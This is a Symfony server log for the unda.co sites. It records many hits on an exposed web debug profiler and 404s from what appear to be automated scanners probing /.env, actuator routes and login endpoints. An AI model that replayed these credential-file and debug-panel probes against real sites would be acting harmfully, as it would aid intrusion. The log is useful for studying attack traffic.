[2025-12-17 08:08:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=logger","method":"GET"} []
[2025-12-17 08:08:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-17 08:13:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34983a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/34983a?panel=cache","method":"GET"} []
[2025-12-17 08:13:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 08:14:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=config","method":"GET"} []
[2025-12-17 08:14:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 08:21:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234?panel=cache","method":"GET"} []
[2025-12-17 08:21:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 08:22:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
[2025-12-17 08:22:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
[2025-12-17 08:23:10] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"c11fb1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/c11fb1/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-17 08:23:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
[2025-12-17 08:25:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 08:27:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56f234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56f234","method":"GET"} []
[2025-12-17 08:27:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 08:27:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-17 08:27:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-17 08:32:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 08:33:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=twig","method":"GET"} []
[2025-12-17 08:33:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 08:34:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 08:37:04] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 08:37:06] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"51838a","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/51838a","method":"GET"} []
[2025-12-17 08:39:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=cache","method":"GET"} []
[2025-12-17 08:39:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 08:43:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 08:43:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 08:45:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=twig","method":"GET"} []
[2025-12-17 08:45:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 08:52:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=time","method":"GET"} []
[2025-12-17 08:52:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 08:52:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 08:54:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 08:58:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=security","method":"GET"} []
[2025-12-17 08:58:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 09:00:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 09:04:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=request","method":"GET"} []
[2025-12-17 09:04:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 09:07:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
[2025-12-17 09:07:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-17 09:09:59] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 09:10:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a27568","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a27568?panel=cache","method":"GET"} []
[2025-12-17 09:10:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 09:16:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=request","method":"GET"} []
[2025-12-17 09:16:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 09:24:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 09:24:22] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-17 09:24:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 09:24:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 09:24:22] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 09:24:22] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 09:24:22] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 09:24:22] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 09:24:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-17 09:24:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-17 09:24:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-17 09:24:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=config","method":"GET"} []
[2025-12-17 09:24:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 09:25:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb6686","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb6686?panel=cache","method":"GET"} []
[2025-12-17 09:25:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 09:31:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=security","method":"GET"} []
[2025-12-17 09:31:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 09:38:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=twig","method":"GET"} []
[2025-12-17 09:38:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 09:43:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 09:43:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 09:43:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 09:43:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 09:43:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 09:43:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 09:43:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 09:43:27] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 09:44:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=82.180.146.199&limit=10","method":"GET"} []
[2025-12-17 09:44:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=82.180.146.199&limit=10","method":"GET"} []
[2025-12-17 09:45:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9727b6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9727b6?panel=swiftmailer","method":"GET"} []
[2025-12-17 09:45:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-17 09:45:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4?panel=time","method":"GET"} []
[2025-12-17 09:45:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 09:49:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 09:53:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a15ff4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a15ff4","method":"GET"} []
[2025-12-17 09:53:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 09:57:44] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-17 09:58:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=176.65.148.43&limit=10&url=https%3A%2F%2Funda.co%2F.env","method":"GET"} []
[2025-12-17 09:58:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=176.65.148.43&limit=10&url=https%3A%2F%2Funda.co%2F.env","method":"GET"} []
[2025-12-17 09:59:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 09:59:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-17 09:59:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"537a47","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/537a47?panel=twig","method":"GET"} []
[2025-12-17 09:59:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 10:01:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 10:01:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 10:01:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /formaction"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /formaction\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:01:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/callback"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/callback\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 10:02:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
